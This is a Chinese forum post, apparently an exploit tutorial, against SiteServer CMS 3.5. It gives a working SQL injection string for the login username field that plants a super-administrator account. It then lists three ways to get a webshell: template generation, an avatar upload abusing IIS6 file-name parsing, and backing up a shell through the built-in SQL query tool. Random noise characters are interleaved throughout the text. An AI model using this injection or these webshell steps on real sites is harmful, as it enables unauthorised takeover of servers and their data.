经测试秒杀最新的3.5版
& L) P2 r: V2 {4 c
3 Q* [/ B; v, A, Z4 g# M# Wstieserver官网:www.siteserver.cn9 F. ^8 b0 w" m1 C/ p9 g3 V* X0 ?: Q
; I+ x4 P4 ^3 w6 q" x4 ]# Z. I& q' q
8 I+ ~: ] D0 H( D
+ Q% J, k, r' l; TEXP:$ Y( V) J: C( U
# f, d1 L. @/ z) ]7 Y直接访问UserCenter/login.aspx
) j: Z0 _" F; I( Z7 w A# ^6 D9 R; r# a, P: W
0 G! p# c; V+ Q" O% m7 C
# N8 f$ X+ d: \! e用户名处输入:6 J. b( o' K" c6 F5 |
4 g- S9 P7 @& J2 [# v123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
* W2 W6 u v0 g' _ \5 E5 w2 s% P1 x! {/ T% o
7 s2 a( T5 L; @$ o; ?3 u& e) L" O' f
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
/ z3 J+ j' h) y6 c- n5 u8 s& C4 q3 X
9 \2 P) \& O. z$ y. h' ?6 \
% X& q3 n, D% ^之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 [5 x; ~( l. V/ ~( B5 b S1 I# S
" F: T7 K. y3 s/ j. J! ^0 w( p. o
" W! Y# J Y: F, m/ O
, Y4 F. [9 c. S" R( W% C. Z2 L7 i后台拿webshell的三种方法:/ k( s; B' ]2 Y/ J, w
2 \* k4 N& R1 m4 l9 ?: Y# }* l
一、, ]+ A/ E) _* f2 |/ y: @; a0 Z2 {
5 x, l* f# p; v% n) \; c3 }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 \* W* N! E; P- E. N+ R) x. E; F8 x' v. J% ?3 S+ ~2 }9 _: d
二、7 A/ l4 q; n% W8 F7 U' v# c
7 e! \* }- `: Q c8 r% P$ a: ^成员权限-》添加用户-》用户名为:1.asp$ a" O/ G2 S, w' K4 a3 D7 g. D" c
& \9 D4 i* A& c* [/ I% Zhttp://127.0.0.1/usercenter/- i% s0 I9 ~3 ^# b( s$ ?# Y
% [! a- @3 }4 U/ j9 c: o用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell3 t* i! Y- }9 e' Z7 K |
0 |% l9 J2 D8 H( Q, | G3 m" m* f
(ps:后台添加用户时不会验证是否含有非法字符)% x1 @6 }$ h* I+ m+ |4 Q
' ^; N- O3 g4 l& l三、" W: b. G' {/ X" s1 v4 M* X
5 @8 i, }' [( L# `" J- F ~* H
系统工具-》实用工具-》机器参数查看
8 u* e Y4 u4 E" O7 b* L7 S- Q, W可以看到数据库类型、名称,WEB路径
% U y' C7 d' @ t S; u1 z5 v& `& V: x% R N( v, J5 P
系统工具-》数据库工具-》SQL语句查询
* J' \, a2 H1 V1 O这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。3 s' _$ x2 G2 C9 e2 X+ ]" r
( Q& \3 r7 ?/ J% E |